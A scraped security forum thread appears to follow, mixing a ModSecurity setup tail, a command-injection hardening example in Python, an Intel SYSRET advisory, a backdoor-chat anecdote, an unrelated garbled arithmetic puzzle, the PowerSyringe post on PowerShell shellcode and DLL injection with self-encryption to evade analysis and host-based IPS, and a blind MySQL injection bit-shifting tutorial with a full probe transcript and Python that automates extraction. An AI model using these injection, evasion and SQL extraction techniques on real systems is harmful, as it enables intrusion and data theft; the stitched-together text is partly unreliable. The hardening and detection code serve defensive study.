To verify if the ModSecurity module is loaded in the Apache type this command: cat /var/log/apache2/error.log | grep modsecurity The output should look like this if configured properly ModSecurity for Apache/2.6.0 (URL) configured. There are still other configurations in ModSecurity for extra added protection so you might wanna visit their official website at ModSecurity: Open Source Web Application Firewall Additional Reading Materials: Php Endangers - Remote Code Execution Source:InfoSec Resources – Command Execution
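The shell_exec("nslookup " . $targethost) pattern and tip 2 above, as an added example written in Python rather than the article's PHP (this is not code from the article): the injectable form is shown next to a hardened form that validates the value against an allow-list and passes it to nslookup as a single argv element, so no shell ever parses it. shlex.quote plays the part of PHP's escapeshellarg(), which wraps one argument as a literal; escapeshellcmd() is the PHP function that escapes metacharacters across a whole command string. The function names, the hostname pattern and the sample input are my own.

```python
import ipaddress
import re
import shlex
import subprocess
from typing import List

# Constructed sample input: the probe from the article, an IP followed by a
# pipe to a second command.
INJECTION_SAMPLE = "74.125.31.102 | echo 'hello'"

# Hypothetical allow-list for hostnames (RFC 1123 shape); my own pattern.
_HOSTNAME_RE = re.compile(
    r"(?=.{1,253}\Z)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)


def vulnerable_command_line(targethost: str) -> str:
    """Equivalent of shell_exec("nslookup " . $targethost): the user value is
    glued into one string that a shell will parse, so '|', ';' and '&&' in
    the input start new commands."""
    return "nslookup " + targethost


def shell_words(command_line: str) -> List[str]:
    """Tokenise a command line the way a POSIX shell would, to show what the
    shell actually sees."""
    return shlex.split(command_line)


def is_valid_target(targethost: str) -> bool:
    """Allow-list check: an IP literal or a well-formed hostname, nothing else."""
    try:
        ipaddress.ip_address(targethost)
        return True
    except ValueError:
        return _HOSTNAME_RE.fullmatch(targethost) is not None


def hardened_argv(targethost: str) -> List[str]:
    """Validate first, then build an argument vector. Passing a list with
    shell=False hands the value to nslookup as one argument; no shell ever
    parses it, so metacharacters cannot start a second command."""
    if not is_valid_target(targethost):
        raise ValueError("rejected target: %r" % targethost)
    return ["nslookup", targethost]


def rejects(targethost: str) -> bool:
    """True when the hardened path refuses the input."""
    try:
        hardened_argv(targethost)
    except ValueError:
        return True
    return False


def quoted_command_line(targethost: str) -> str:
    """Fallback when a shell string is unavoidable: shlex.quote wraps the
    value so the shell treats it as one literal argument, the job PHP's
    escapeshellarg() does."""
    return "nslookup " + shlex.quote(targethost)


def run_lookup(targethost: str) -> str:
    """Run the lookup through the hardened path (needs nslookup installed)."""
    argv = hardened_argv(targethost)
    return subprocess.run(argv, capture_output=True, text=True, timeout=10).stdout


if __name__ == "__main__":
    print(shell_words(vulnerable_command_line(INJECTION_SAMPLE)))
    print(rejects(INJECTION_SAMPLE), hardened_argv("74.125.31.102"))
```

shell_words() makes the difference visible: the concatenated string splits into five words with "|" in the middle, while the quoted string stays one argument. Validation comes before quoting on purpose; quoting stops the shell from reinterpreting the value but does not stop nslookup from receiving garbage.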
  16. Intel CPU Vulnerability can provide control of your system to attacker

The U.S. Computer Emergency Readiness Team (US-CERT) has disclosed a flaw in Intel chips that could allow hackers to gain control of Windows and other operating systems. The flaw has already been exploited on 64-bit versions of Microsoft Windows 7, FreeBSD, NetBSD and there’s a chance Apple’s OS X may also be vulnerable. The vulnerability was disclosed in a security advisory released this week. Attackers could execute malicious code via kernel privileges or launch a local privilege escalation attack. VMware's virtualization software is not affected, and neither are AMD's processors, as they do not use the SYSRET instruction whose incorrect handling causes the flaw, or handle it differently. Many of the affected vendors have already pushed out an update that defuses the flaw. However, it said that while 32-bit operating systems are safe, "Intel CPUs that use the Intel 64 extension need the security patches released by Microsoft in their MS12-042 security bulletin."

Source: Intel CPU Vulnerability can provide control of your system to attacker | The Hacker News
  17. This is an impressive and first-time experience in my anti-virus career. I chatted with a hacker while debugging a virus. Yes, it’s true. It happened when the Threat team was researching key loggers for Diablo III, while many game players playing this game found their accounts stolen. A sample was found on battle.net in Taiwan, China. The hacker posted a topic titled “How to farm Izual in Inferno” (Izual is a boss in Diablo III ACT 4), and provided a link in the content which, as he said, pointed to a video demonstrating the means. Below is the ‘Video’. It’s actually a RAR archive containing two executable files. These two files are almost the same except for the icon. The malware will connect to a remote server via TCP port 80 and download a new file packed by Themida. That’s very simple Downloader/Backdoor behavior and we were only interested in looking for key logging code for Diablo III, so we didn’t pay much attention to it. But an astonishing scene was staged at this time. A chat dialog popped up with a text message (translated from the image below):

Hacker: What are you doing? Why are you researching my Trojan?
Hacker: What do you want from it?

The dialog is not from any software installed in our virtual machine. On the contrary, it’s an integrated function of the backdoor and the message was sent from the hacker who wrote the Trojan. Amazing, isn’t it? It seems that the hacker was online and he realized that we were debugging his baby. We felt interested and continued to chat with him. He was really arrogant. (Translated from the image below)

Chicken: I didn’t know you can see my screen.
Hacker: I would like to see your face, but what a pity you don’t have a camera.

He is telling the truth. This backdoor has powerful functions like monitoring the victim’s screen, mouse controlling, viewing processes and modules, and even camera controlling. We then chatted with the hacker for some time, pretending that we were green hands and would like to buy some Trojan from him. But this hacker was not so foolish as to tell us all the truth. He then shut down our system remotely. Regarding this malware, no Diablo III key logging code was captured. What it really wants to steal is the dial-up connection’s username and password. It sounds like a movie story, but it’s real. We are familiar with malware and we are fighting with them every day. But chatting with malware writers in real time doesn’t happen so often. Next time, I will be on the alert. The malware and its components are detected by AVG as Trojan horse BackDoor.Generic variants.

Franklin Zhao & Jason Zhou

Source: Have you ever chatted with a Hacker within a virus?
  18. Download Link: PowerSyringe.ps1

So I decided to expand upon my previous post and create a slightly more full-featured PowerShell-based code/DLL injection utility. Behold, PowerSyringe. As the name implies, I based some of the code on the original Syringe toolkit. I added several features though - specifically, 64-bit support and encryption. Here is a rundown of its features:

Shellcode injection from within PowerShell
Shellcode injection into any 32 or 64-bit process
DLL injection into any 32 or 64-bit process
Encryption - The script can encrypt itself and outputs the encrypted version to .\evil.ps1. This will make analysis of the script impossible/improbable without the correct password and salt (or if they happen to perform live memory forensics). >D
Decryption - evil.ps1 will decrypt itself back into its original form if you provide the right password and salt
Doesn't flag DEP b/c it doesn't execute in the stack
Fairly detailed documentation

I’ve tested the tool on several 32 and 64-bit platforms but I would love to get some feedback/feature requests. To execute the script, ensure that your execution policy allows you to execute scripts. If not, no worries. You can simply copy and paste all of the code into a PowerShell prompt. Then you can run ‘help PowerSyringe -full’ for detailed documentation. There are several other methods for bypassing the execution policy. One of those methods is detailed here. Here is an excerpt of the documentation with usage examples:

DLL Injection
C:\PS>PowerSyringe 1 4274 .\evil.dll
Description
Inject 'evil.dll' into process ID 4274.

Inject shellcode into process
C:\PS>PowerSyringe 2 4274
Description
Inject the shellcode as defined in the script into process ID 4274.

Execute shellcode within the context of PowerShell
C:\PS>PowerSyringe 3
Description
Execute the shellcode as defined in the script within the context of PowerShell.

Encrypt the script with the password 'password' and salt 'salty'
C:\PS>PowerSyringe 4 .\PowerSyringe.ps1 password salty
Description
Encrypt the contents of this file with a password and salt. This will make analysis of the script impossible without the correct password and salt combination. This command will generate evil.ps1 that can be dropped onto the victim machine. It only consists of a decryption function 'de' and the base64-encoded ciphertext.
Note: This command can be used to encrypt any text-based file/script

Decrypt encrypted script and execute it in memory
C:\PS>[string] $cmd = Get-Content .\evil.ps1
C:\PS>Invoke-Expression $cmd
C:\PS>$decrypted = de password salt
C:\PS>Invoke-Expression $decrypted
Description
After you run the encryption option and generate evil.ps1, these commands will decrypt and execute (i.e. define the function) PowerSyringe entirely in memory, assuming you provided the proper password and salt combination. Upon successful completion of these commands, you can execute PowerSyringe as normal.
Note: "Invoke-Expression $decrypted" may generate an error. Just ignore it. PowerSyringe will still work.

This is what evil.ps1 will look like after the encryption function is called:

function de([String] $b, [String] $c)
{
    # $a (encrypted PowerSyringe.ps1) truncated for sanity
    $a = "M4g3yq9lTiMC+GTN2qNCRuUg1TFM8bgSvlxl/ENmXWpEIIgrdMq31/Jl025jClm9CcVZz7VIA40TV...";
    $encoding = New-Object System.Text.ASCIIEncoding;
    # fixed 16-byte IV
    $dd = $encoding.GetBytes("CRACKMEIFYOUCAN!");
    $aa = [Convert]::FromBase64String($a);
    # 32-byte key derived from password $b and salt $c (PasswordDeriveBytes, SHA1, 2 iterations)
    $derivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($b, $encoding.GetBytes($c), "SHA1", 2);
    [Byte[]] $e = $derivedPass.GetBytes(32);
    # Rijndael (AES) in CBC mode
    $f = New-Object System.Security.Cryptography.RijndaelManaged;
    $f.Mode = [System.Security.Cryptography.CipherMode]::CBC;
    [Byte[]] $h = New-Object Byte[]($aa.Length);
    $g = $f.CreateDecryptor($e, $dd);
    $i = New-Object System.IO.MemoryStream($aa, $True);
    $j = New-Object System.Security.Cryptography.CryptoStream($i, $g, [System.Security.Cryptography.CryptoStreamMode]::Read);
    $r = $j.Read($h, 0, $h.Length);
    $i.Close();
    $j.Close();
    $f.Clear();
    return $encoding.GetString($h, 0, $h.Length);
}

As you can see, the decryption script is slightly 'obfuscated', if you even want to call it that. It's pretty obvious that it decrypts the $a variable. Unfortunately, anyone performing analysis on this evil script will have no idea what the contents of $a are without the correct password and salt. The primary reason I wrote this was because I had been using Syringe on assessments to bypass host-based IPS systems, but I didn't like some of the limitations of Syringe (specifically, no 64-bit support) and I like the idea of performing everything in memory without needing to drop any executables. That being said, I welcome your constructive feedback. Enjoy!

Source: Exploit Monday: PowerSyringe - PowerShell-based Code/DLL Injection Utility
  19. I sat and thought a bit about this problem and realized the following. Actually the problem goes like this: 50+50=100, 100-97=3 and you have to give back 50 euros to each, but you also give back 1 each out of the 3 left over, and so 49 euros remain to be paid to each parent. And 49+49=98, which is the money that has to be returned, so there is no reason to add our 1 as well. So, in short, we had 3 euros left and had to pay back the 100 euros borrowed; we give 2 more euros (3-2=1 euro left) and only 98 remain to be paid (100-2=98 to pay), and here there is nothing else to add. Or we simply didn't give them anything more.
  20. Faster Blind MySQL Injection Using Bit Shifting

###
# Faster blind MySQL injection using bit shifting | Ack Ack for a HTML version
# Made by Jelmer de Hen
# H.ackAck.net
#####

While strolling through mysql.com I came across this page: MySQL :: MySQL 5.0 Reference Manual :: 12.11 Bit Functions. There you can view the possibility of the bitwise function right shift. A bitwise right shift will shift the bits 1 location to the right and add a 0 to the front. Here is an example:

mysql> select ascii(b'00000010');
+--------------------+
| ascii(b'00000010') |
+--------------------+
|                  2 |
+--------------------+
1 row in set (0.00 sec)

Right shifting it 1 location will give us:

mysql> select ascii(b'00000010') >> 1;
+-------------------------+
| ascii(b'00000010') >> 1 |
+-------------------------+
|                       1 |
+-------------------------+
1 row in set (0.00 sec)

It will add a 0 at the front and remove 1 character at the end.

00000010 = 2
00000010 >> 1 = 00000001
                ^      ^
                0      shifted

So let's say we want to find out a character of a string during blind MySQL injection, use the least possible amount of requests and do it as soon as possible: we could use binary search, but that will quickly take a lot of requests. First we split the ascii table in half and try if it's on 1 side or the other; that leaves us ~64 possible characters. Next we chop it in half again, which will give us 32 possible characters. Then again we get 16 possible characters. After the next split we have 8 possible characters and from this point it's most of the time guessing or splitting it in half again. Let's see if we can beat that technique by optimizing this - but first more theory about the technique I came up with. There are always 8 bits reserved for ASCII characters. An ASCII character can be converted to its decimal value as you have seen before:

mysql> select ascii('a');
+------------+
| ascii('a') |
+------------+
|         97 |
+------------+
1 row in set (0.00 sec)

This will give a nice int which can be used as binary.

a = 01100001

If we would left shift this character 7 locations to the right you would get:

00000000

The first 7 bits are being added by the shift, the last character remains, which is 0.

mysql> select ascii('a') >> 7;
+-----------------+
| ascii('a') >> 7 |
+-----------------+
|               0 |
+-----------------+
1 row in set (0.00 sec)

a = 01100001
01100001 >> 7 == 00000000 == 0
01100001 >> 6 == 00000001 == 1
01100001 >> 5 == 00000011 == 3
01100001 >> 4 == 00000110 == 6
01100001 >> 3 == 00001100 == 12
01100001 >> 2 == 00011000 == 24
01100001 >> 1 == 00110000 == 48
01100001 >> 0 == 01100001 == 97

When we did the bitshift of 7 we had 2 possible outcomes - 0 or 1 - and we can compare it to 0 and 1 and determine that way if it was 1 or 0.

mysql> select (ascii('a') >> 7)=0;
+---------------------+
| (ascii('a') >> 7)=0 |
+---------------------+
|                   1 |
+---------------------+
1 row in set (0.00 sec)

It tells us that it was true that if you would shift it 7 bits the outcome would be equal to 0. Once again, if we would right shift it 6 bits we have the possible outcomes of 1 and 0.

mysql> select (ascii('a') >> 6)=0;
+---------------------+
| (ascii('a') >> 6)=0 |
+---------------------+
|                   0 |
+---------------------+
1 row in set (0.00 sec)

This time it's not true, so we know the first 2 bits of our character are "01". If the next shift results in "010" it would equal 2; if it would be "011" the outcome would be 3.

mysql> select (ascii('a') >> 5)=2;
+---------------------+
| (ascii('a') >> 5)=2 |
+---------------------+
|                   0 |
+---------------------+
1 row in set (0.00 sec)

It is not true that it is 2, so now we can conclude it is "011". The next possible options are:

0110 = 6
0111 = 7

mysql> select (ascii('a') >> 4)=6;
+---------------------+
| (ascii('a') >> 4)=6 |
+---------------------+
|                   1 |
+---------------------+
1 row in set (0.00 sec)

We got "0110" now, and looking at the table for a above you can see this actually is true. Let's try this on a string we actually don't know, user() for example. First we shall right shift by 7 bits; possible results are 1 and 0.

mysql> select (ascii((substr(user(),1,1))) >> 7)=0;
+--------------------------------------+
| (ascii((substr(user(),1,1))) >> 7)=0 |
+--------------------------------------+
|                                    1 |
+--------------------------------------+
1 row in set (0.00 sec)

We now know that the first bit is set to 0.

0???????

The next possible options are 0 and 1 again, so we compare it with 0.

mysql> select (ascii((substr(user(),1,1))) >> 6)=0;
+--------------------------------------+
| (ascii((substr(user(),1,1))) >> 6)=0 |
+--------------------------------------+
|                                    0 |
+--------------------------------------+
1 row in set (0.00 sec)

Now we know the second bit is set to 1.

01??????

Possible next options are:

010 = 2
011 = 3

mysql> select (ascii((substr(user(),1,1))) >> 5)=2;
+--------------------------------------+
| (ascii((substr(user(),1,1))) >> 5)=2 |
+--------------------------------------+
|                                    0 |
+--------------------------------------+
1 row in set (0.00 sec)

The third bit is set to 1.

011?????

Next options:

0110 = 6
0111 = 7

mysql> select (ascii((substr(user(),1,1))) >> 4)=6;
+--------------------------------------+
| (ascii((substr(user(),1,1))) >> 4)=6 |
+--------------------------------------+
|                                    0 |
+--------------------------------------+
1 row in set (0.00 sec)

This bit is also set.

0111????

Next options:

01110 = 14
01111 = 15

mysql> select (ascii((substr(user(),1,1))) >> 3)=14;
+---------------------------------------+
| (ascii((substr(user(),1,1))) >> 3)=14 |
+---------------------------------------+
|                                     1 |
+---------------------------------------+
1 row in set (0.00 sec)

01110???

Options:

011100 = 28
011101 = 29

mysql> select (ascii((substr(user(),1,1))) >> 2)=28;
+---------------------------------------+
| (ascii((substr(user(),1,1))) >> 2)=28 |
+---------------------------------------+
|                                     1 |
+---------------------------------------+
1 row in set (0.00 sec)

011100??

Options:

0111000 = 56
0111001 = 57

mysql> select (ascii((substr(user(),1,1))) >> 1)=56;
+---------------------------------------+
| (ascii((substr(user(),1,1))) >> 1)=56 |
+---------------------------------------+
|                                     0 |
+---------------------------------------+
1 row in set (0.00 sec)

0111001?

Options:

01110010 = 114
01110011 = 115

mysql> select (ascii((substr(user(),1,1))) >> 0)=114;
+----------------------------------------+
| (ascii((substr(user(),1,1))) >> 0)=114 |
+----------------------------------------+
|                                      1 |
+----------------------------------------+
1 row in set (0.00 sec)

Alright, so the binary representation of the character is:

01110010

Converting it back gives us:

mysql> select b'01110010';
+-------------+
| b'01110010' |
+-------------+
| r           |
+-------------+
1 row in set (0.00 sec)

So the first character of user() is "r". With this technique we can be sure that we have the character in 8 requests. This technique can be optimized further. The ASCII table is just 127 characters, which is 7 bits per character, so we can assume we will never go over it and reduce this technique by 1 request per character. Chances are higher the second bit will be set to 1, since the second part of the ASCII table (characters 77-127) contains the characters a-z A-Z - the first part however contains numbers, which are also used a lot, but when automating it you might just want to try and skip this bit and immediately try for the next one.

© Offensive Security 2011

Source: Vulnerability analysis, Security Papers, Exploit Tutorials
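The bit-by-bit recovery walked through above, as an added example in Python that is not part of the original paper: a local function stands in for the true/false answer of the injected expression, so the whole thing runs offline and simply exercises the arithmetic. It shows the 8-request case, the 7-request case the last paragraph describes (top bit assumed 0 for 7-bit ASCII), and reproduces the probe expressions from the transcript. The regular expression at the end is the defender's side: the probes have a distinctive shape, and the function flags it in constructed query-log lines. Function names, the oracle abstraction and the sample log are my own.

```python
import re
from typing import Callable, List, Tuple

# Constructed stand-in for the boolean answer of a blind injection: it says
# whether (ascii(c) >> shift) == expected for a character c that the caller
# cannot see directly. No database is involved.
Oracle = Callable[[int, int], bool]


def make_oracle(secret: str, position: int) -> Oracle:
    """Oracle for the character at 1-based `position` of `secret`."""
    code = ord(secret[position - 1])
    return lambda shift, expected: (code >> shift) == expected


def probe_expression(position: int, shift: int, expected: int,
                     column: str = "user()") -> str:
    """The MySQL boolean expression used in the transcript for one step."""
    return f"(ascii((substr({column},{position},1))) >> {shift})={expected}"


def recover_char(oracle: Oracle, bits: int = 8) -> Tuple[str, int]:
    """Recover one character, most significant bit first.

    Each query asks whether the bits found so far, extended by a 0, equal
    ascii(c) >> shift; a 'false' answer means the new bit is 1.  With
    bits=7 the top bit is assumed to be 0 (7-bit ASCII), which is the
    one-request-per-character saving described above.
    Returns (character, number of oracle queries).
    """
    value, queries = 0, 0
    for shift in range(bits - 1, -1, -1):
        guess = value << 1          # known prefix with the next bit as 0
        queries += 1
        value = guess if oracle(shift, guess) else guess | 1
    return chr(value), queries


def recover_string(secret: str, bits: int = 8) -> Tuple[str, int]:
    """Recover every character of `secret`; returns (text, total queries)."""
    chars, total = [], 0
    for pos in range(1, len(secret) + 1):
        ch, n = recover_char(make_oracle(secret, pos), bits)
        chars.append(ch)
        total += n
    return "".join(chars), total


# Defender side: ascii(...) >> N )= M is the signature of these probes.
_PROBE_RE = re.compile(r"ascii\s*\(.*\)\s*>>\s*\d+\s*\)\s*=\s*\d+", re.IGNORECASE)


def is_bitshift_probe(query: str) -> bool:
    """True when a logged query carries the bit-shift probe shape."""
    return _PROBE_RE.search(query) is not None


# Constructed general-log lines; two carry the probe shape.
SAMPLE_LOG = [
    "SELECT id FROM posts WHERE id=1",
    "SELECT id FROM posts WHERE id=1 AND (ascii((substr(user(),1,1))) >> 7)=0",
    "SELECT id FROM posts WHERE id=1 AND (ascii((substr(user(),1,1))) >> 6)=0",
    "SELECT name FROM users WHERE id=7",
]


def flag_probes(lines: List[str]) -> List[int]:
    """Indexes of the log lines that look like bit-shift probes."""
    return [i for i, q in enumerate(lines) if is_bitshift_probe(q)]


if __name__ == "__main__":
    print(recover_char(make_oracle("a", 1)))          # ('a', 8)
    print(recover_string("root@localhost", bits=7))   # 14 chars, 98 queries
    print(flag_probes(SAMPLE_LOG))                    # [1, 2]
```

The detection regex is deliberately loose (it ignores spacing and case) because the probes on the page vary only in the shift count and the compared value; a burst of such queries against the same column, one per bit, is the pattern worth alerting on.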